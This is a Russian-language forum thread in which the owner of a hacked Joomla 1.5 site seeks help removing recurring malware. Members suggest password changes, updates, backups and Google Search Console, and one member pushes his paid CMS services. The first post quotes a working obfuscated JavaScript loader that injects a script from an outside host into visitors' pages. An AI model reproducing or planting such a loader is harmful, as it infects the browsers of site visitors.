powered by simpleCommunicator - 2.0.53     © 2025 Programmizd 02
23 сообщений из 23, страница 1 из 1
Вирус на сайте
    #1022251
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
На хосте лежит две cms (joomla для сайта и другая для магазина).
Недавно появились проблемы с joomlой.

В файл шаблона в конец дописывается такая ересь
(оригинальный текст не сохранился, выкладываю похожий пример из гугла):
Код: JavaScript
1.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b f(5){8(3.e&&3.d){6 g=3.d(\'h\')[0];6 4=3.e(\'j\');4.7(\'l\',\'i/k\');4.7(\'5\',5);g.w(4)}}b a(){6 2=c.m.t();8((2.9("u")==-1&&2.9("v")!=-1)&&c.s()){f("r://n.o.2/p.q")}}a();',33,33,'||ua|document|script_tag|src|var|setAttribute|if|indexOf|includeCounter|function|navigator|getElementsByTagName|createElement|includeJavascript|head_tag|head|text|script|javascript|type|userAgent|tekezaz|pp|counter|js|http|javaEnabled|toLowerCase|chrome|win|appendChild'.split('|'),0,{}))
Плюс во все папки джумлы добавляются 5 файлов:
common_config.php
engine_functions.php
menu_settings.php
post_controller.php
system_m.php

Суть вируса - при любом клике на сайте он открывает левую страницу.

Уже два раза удалял, падла продолжает появляться.
Подскажите, куда ковырять?
...
Рейтинг: 0 / 0
Вирус на сайте
    #1022281
Фотография Cat2
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Karjalan, живой
Может быть поможет
https://joomlaforum.ru/index.php/topic,246899.630.html
...
Рейтинг: 0 / 0
Вирус на сайте
    #1022388
Фотография Программизд 02
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Администратор
Гидроцефалы всех стран соединяйтесь!
Енот

Поменяй пароль ftp и проверь н перстанут появляться
...
Рейтинг: 1 / 0
Нравится: чебурах
Вирус на сайте
    #1024064
Конякула
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей]
Шут - адвокат разума
Движок обнови ну и про пароли тебе уже советовали.

Пароль не храни на компьютере. И ни кому не посылай и не давай. Комп проверь на вирусы. Может у тебя кейлогер на компьютере завёлся и шлёт пароли куда следует.
...
Рейтинг: 0 / 0
Вирус на сайте
    #1079369
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Народ, просветите по всяким шеллам и инъекциям. На пальцах - что это, как происходит и какие возможности дает?

Продолжается беда, описанная в первом посте.
Гугл заблочил сайт.

Пароли от хоста, ftp менял - не помогло.
Видимо жук живет в папках.
Обновлять cms невозможно - переписанная joomla 1.5. Это все делать с нуля. Пока не вариант.

Может есть универсальная фраза для поиска по php и js файлам, которая редактирует файл шаблона и срет вредными файлами в каталоги?
...
Рейтинг: 0 / 0
Вирус на сайте
    #1079480
Фотография Программизд 02
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Администратор
Гидроцефалы всех стран соединяйтесь!
Енот

Похоже найдена какая то уязвимость старой джумлы хакботом. И теперь через нее он вписывает вредный код снова и снова.

Если есть бэкап системы (сорцы + база) до заражения, накати его.

Если заражение продолжится, единственный выход переписывать сайт на более новой и надежной cms
...
Рейтинг: 0 / 0
Вирус на сайте
    #1079482
Енот

Ещё может быть вредонос сидит на одном с тобой хостинге и лезет через баги хостинга.
...
Рейтинг: 0 / 0
Вирус на сайте
    #1080361
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Отключил ftp, посмотрим, может в нем дело.
На файл шаблона поставил права 444
...
Рейтинг: 0 / 0
Вирус на сайте
    #1080424
Фотография бухалтер фантоцци
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Программизд 02  28.03.2019, 08:16
на более новой и надежной cms
смишно
...
Рейтинг: 0 / 0
Вирус на сайте
    #1080431
Фотография Программизд 02
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Администратор
Гидроцефалы всех стран соединяйтесь!
бухалтер фантоцци  28.03.2019, 13:09
Программизд 02  28.03.2019, 08:16
на более новой и надежной cms
смишно
Т.е. все CMS одинаково ненадежны? :)
...
Рейтинг: 0 / 0
Вирус на сайте
    #1080441
Жумла-решето!
...
Рейтинг: 0 / 0
Вирус на сайте
    #1080630
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Приблуда от гугла показала проблемные zip файлы.
Почистил, посмотрим.
...
Рейтинг: 0 / 0
Вирус на сайте
    #1080673
Фотография бухалтер фантоцци
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Программизд 02  28.03.2019, 13:11
бухалтер фантоцци  28.03.2019, 13:09
Программизд 02  28.03.2019, 08:16
...
смишно
Т.е. все CMS одинаково ненадежны? :)
Ничего надёжного нет, всё упирается в стоимость, тут массовые CMS вообще днище.
Решается платной техподдержкой или платным спецом. Всё зависит от цены.
...
Рейтинг: 0 / 0
Вирус на сайте
    #1081279
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Нашел консоль управления вирусным сервером.

Мой сайт заражен вирусом JS/Coinhive.

Кто подскажет как нейтрализовать?
...
Рейтинг: 0 / 0
Вирус на сайте
    #1081997
Green2
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
[не активирован]
sql server
Flash
Windows
1C
Unity3D
Енот  28.03.2019, 16:20
Нашел консоль управления вирусным сервером.

Мой сайт заражен вирусом JS/Coinhive.

Кто подскажет как нейтрализовать?
Я когда то накатывал безвирусные бекапы..
...
Рейтинг: 0 / 0
Вирус на сайте
    #1082831
Конякула
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей]
Шут - адвокат разума
Делаю сайты не дорого.

По существу:
1. Старая как гавно мамонта Joomla дырявая как решето. Удалять из неё зараженные файлы бесполезно. Надо обновлять.
2. Отключать ftp бесполезно. Ни кто в ftp не лезет. Если на сайте стоит бекдор, то он позволяет делать с файлами на сайте чего угодно и чо угодно там запускать.
3. Бесплатные CMS они очень дорогие. Потому что в платной заплатил один раз в год и потом в случае чего ТП разработчика допикаешь. А в бесплатной, скачал бесплатно, поставил и потом в случае чего тратиш кучу времени, чтобы понять что случилось и как это чинить или кучу денег, чтобы нанять спец, который способен это починить.

Потому предлагаю сэкономить и заказать у меня сайт на UMI CMS. Сделаю не дорого (относительно), по стандартам, можно будет обновлять и потом в случае проблем будет куда обратиться.

Если интересно, пиши в личку. Пришли ссылку на сайт, я посчитаю сколько будет стоить переделать его на UMI.
...
Рейтинг: 0 / 0
Вирус на сайте
    #1083399
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Короч, победил.

Советую всем, кто еще не в теме, добавить свой сайт в Google Search Console.

Там есть раздел "безопасность", где выводится текущий статус сайта по мнению гугла.
И главное - ссылки на подозрительные сайты.
А вообще, как я вчера выяснил, есть целая индустрия. Есть куча сайтов, в том числе от разработчиков антивирей, которые мониторят интернет, сканируют файлы и присваивают сайту статум - безопасный или нет. Гугл использует эти данные и легко может выкинуть опасный сайт из выдачи.
Вчера в обед удалил вирусы, а сегодня утром сайт уже выдается в поиске.

Этот сервис собственно и показал зараженные zip и нонейм файлы.
Моя ошибка, почему я их не нашел вручную - я искал последние файлы среди php и js. Удалял их, а они появлялись снова.
Консоль управления хостом не дает делать поиск по маске *.*
...
Рейтинг: 0 / 0
Вирус на сайте
    #1084434
Конякула
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей]
Шут - адвокат разума
Ну когда через неделю всё обратно появится, ты обращайся. Сделаю тебе сайт на UMI.
...
Рейтинг: 0 / 0
Вирус на сайте
    #1085752
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Конякула  29.03.2019, 14:15
Ну когда через неделю всё обратно появится, ты обращайся. Сделаю тебе сайт на UMI.
Пока такой задачи не стоит.
А когда встанет - буду сам делать.
За советами обращусь на форум друзей :)
...
Рейтинг: 0 / 0
Вирус на сайте
    #1087389
Фотография Гарыныч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей кроме]
Енот  29.03.2019, 18:49
Конякула  29.03.2019, 14:15
Ну когда через неделю всё обратно появится, ты обращайся. Сделаю тебе сайт на UMI.
Пока такой задачи не стоит.
А когда встанет - буду сам делать.
За советами обращусь на форум друзей :)
аменя научите?
...
Рейтинг: 0 / 0
Вирус на сайте
    #1088557
Конякула
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
[игнорирует гостей]
Шут - адвокат разума
Гарыныч  30.03.2019, 03:37
Енот  29.03.2019, 18:49
Конякула  29.03.2019, 14:15
...
Пока такой задачи не стоит.
А когда встанет - буду сам делать.
За советами обращусь на форум друзей :)
аменя научите?
Научу. Записывай: Заказывай сайт только на коммерческой CMS у человека, который умеет делать сайты. Таким образом ты сильно сэкономишь. Как деньги, так и время, нервы. Например заказывай сайт у меня. Я его на UMI сделаю.
...
Рейтинг: 0 / 0
Период между сообщениями больше года.
Вирус на сайте
    #2202226
Кролег
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Енот  28.03.2019, 16:20
Нашел консоль управления вирусным сервером.

Мой сайт заражен вирусом JS/Coinhive.

Кто подскажет как нейтрализовать?
Удолить шиндомс.
...
Рейтинг: 0 / 0
Вирус на сайте
    #2202504
Енот
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Врядли кому пригодится, но проблема решилась сменой логина админа со стандартного admin.
Уязвимость джумлы 1.5
...
Рейтинг: 1 / 0
Нравится: Владайка
23 сообщений из 23, страница 1 из 1
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Цитировать
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]